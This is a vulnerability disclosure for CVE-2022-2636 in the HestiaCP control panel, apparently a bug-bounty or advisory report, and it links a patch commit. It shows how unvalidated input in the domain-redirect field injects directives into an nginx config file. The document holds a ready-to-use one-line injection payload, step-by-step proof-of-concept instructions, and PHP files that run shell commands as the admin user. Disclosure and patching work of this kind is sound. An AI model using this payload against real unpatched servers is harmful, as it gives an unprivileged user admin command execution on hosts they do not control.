CVE-2022-2636 HestiaCP Privilege Escalation Nginx Conf Priv Esc

Privilege Escalation

Hestiacp <=1.6.5 is vulnerable to privilege escalation. Improper input validation allows an attacker to privilege escalation and can make crash nginx server. There is no input validation in the v-add-web-domain-redirect#L82, and v-redirect-custom input on the “Edit Web Domain” page, inputs are written directly to the /home/user/conf/web/domain.com/nginx.conf_redirect file. This file is included in /home/user/conf/web/domain.com/nginx.conf file.

/home/user/conf/web/domain.com/nginx.conf

...
location ~ /\.(?!well-known\/|file) {
       deny all;
       return 404;
    }

    include /home/test/conf/web/poc.com/nginx.conf_*;
}

/home/user/conf/web/domain.com/nginx.conf_redirect file before payload (input is asd)

if ($host != "asd") {
   return 301 $scheme://asd$request_uri;
}

/home/user/conf/web/domain.com/nginx.conf_redirect file after payload

if ($host != "redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock;  } if ( $host = false ) { #") {
   return 301 $scheme://redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock;  } if ( $host = false ) { #$request_uri;
}

PoC

  1. Payload ( has to be one line! )
    redStar$request_uri; ## " ) {}   location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock;  } if ( $host = false ) { #
    
  2. login as user
  3. Create a domain in dashbard
  4. go to Files in top bar
  5. go to “public_html” folder and create a php file contains like below, visit php file with browser, prepare your payload with fullpath and hostname information.
     x.php
    
     <?php
    
     echo  getcwd();
     echo "<br>";
     system("hostname");
    
  6. go to “Edit Web Domain” page in dashboard, select “Enable domain redirection” then select “Redirect visitors to a custom domain or web address”, enter payload to text box and click save button.
  7. go to “public_html” folder, create a php file named adminShell.php
     adminShell.php
    
     <?php
     system("id; whoami;");
    
  8. Visit /adminShell.php with browser, commands running as “admin” user.

PoC Video

Patch Commit

https://github.com/hestiacp/hestiacp/commit/b178b9719bb2c98cf8a6db70065086f596afad81